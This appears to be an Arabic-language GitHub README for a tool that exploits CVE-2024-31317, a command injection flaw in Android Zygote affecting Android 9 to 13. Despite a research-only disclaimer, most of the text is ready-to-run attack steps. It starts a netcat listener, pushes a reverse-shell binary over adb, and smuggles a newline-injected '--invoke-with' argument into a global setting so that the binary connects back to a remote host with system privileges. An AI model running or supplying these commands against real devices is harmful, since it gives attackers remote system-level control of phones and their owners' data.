
CVE-2024-31317 أداة بحث ونشر ثغرة حقن الأوامر في Android Zygote | إطار استغلال الثغرات Android 9-13
هذا المشروع مخصص لأغراض البحث والتعليم الأمني فقط. استخدام هذه الأداة في اختبار غير مصرح به غير قانوني. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر.
CVE-2024-31317 هو ثغرة أمنية خطيرة تؤثر على أجهزة Android من الإصدار 9 إلى 13، وتسمح للتطبيقات التي لديها إذن WRITE_SECURE_SETTINGS بالحصول على صلاحيات على مستوى النظام من خلال حقن الأوامر.
يوفر هذا المشروع تحليلًا تقنيًا مفصلاً للثغرة، وكود إثبات المفهوم، وأدوات النشر الآلي.
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# تشغيل المستمع
nc -lvnp 4444
# دفع وتنفيذ
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# حقن الحمولة
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# تشغيل الثغرة
adb shell stop && adb shell start
هذا المشروع مخصص لأغراض البحث والتعليم الأمني فقط. باستخدام هذه الأداة، فإنك توافق على:
هذا المشروع مرخص بموجب ترخيص MIT - انظر ملف LICENSE للتفاصيل
fcy10012 - GitHub
المشروع المرجعي: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ إذا كان هذا المشروع مفيدًا لك، فضلاً أعطه نجمة!